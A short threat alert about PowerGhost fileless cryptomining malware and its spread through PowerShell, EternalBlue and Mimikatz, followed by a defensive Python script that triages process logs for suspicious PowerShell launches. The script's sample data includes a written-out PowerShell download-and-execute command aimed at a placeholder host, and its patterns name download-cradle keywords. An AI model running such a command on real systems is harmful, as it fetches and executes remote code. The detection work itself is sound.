
THREAT ALERT: FILELESS MALWARE TARGETING CORPORATE SYSTEMS

Friday, August 3, 2018
Posted by: Louise Haas

Threat actors are deploying a new fileless malware to target corporate networks across the world. Dubbed PowerGhost, the fileless malware is distributed by infecting a single system in a business network and then propagates to other computers and servers on the network via PowerShell, EternalBlue, and Mimikatz. Once infected, devices are used to mine cryptocurrency, allowing threat actors to make a quick profit as the number of infected devices increases. The infection process begins with the attacker deploying exploits or remote administration tools such as Windows Management Instrumentation. During the infection process, a one-line PowerShell script runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module. Once one machine is infected, Mimikatz is used to collect account credentials from the current machine and works together with the EternalBlue exploit to propagate through the network and infect additional devices. The NJCCIC recommends users and administrators review SecureList’s blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities.
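For defenders, the first stage described above (PowerShell launched through Windows Management Instrumentation and pulling down further components) can be triaged from process-creation logs. The following is an added example, not code from NJCCIC or SecureList; the event field names, hostnames, the `example.invalid` URL and the scoring thresholds are assumptions, and the sample records are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records (fields modelled on Sysmon Event ID 1).
WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": WMI, "image": PS,
     "cmdline": "powershell.exe -NoP -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage')\""},
    {"host": "WS-020", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inv.ps1"},
    {"host": "SRV-03", "parent": WMI, "image": PS,
     "cmdline": "powershell.exe -Command Get-Service"},
    {"host": "WS-031", "parent": WMI, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ver"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I)
E_FLAG = re.compile(r"(?<=\s)-(e[a-z]*)\b", re.I)  # candidate -e... switches

def reasons(ev):
    """Return the reasons a PowerShell launch looks suspicious (empty = none)."""
    if basename(ev["image"]).lower() not in POWERSHELL:
        return []
    found = []
    if basename(ev["parent"]).lower() == "wmiprvse.exe":
        found.append("started by the WMI provider host")
    if FETCH.search(ev["cmdline"]):
        found.append("command line fetches remote content")
    # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...),
    # but -ExecutionPolicy must not be mistaken for it.
    if any("encodedcommand".startswith(f.lower()) for f in E_FLAG.findall(ev["cmdline"])):
        found.append("encoded command argument")
    return found

def triage(events):
    """Return (host, severity, reasons) for each event with at least one reason.
    One reason alone is 'medium' because management tools also use WMI."""
    hits = []
    for ev in events:
        why = reasons(ev)
        if why:
            hits.append((ev["host"], "high" if len(why) >= 2 else "medium", why))
    return hits

if __name__ == "__main__":
    for host, severity, why in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host}: {'; '.join(why)}")
```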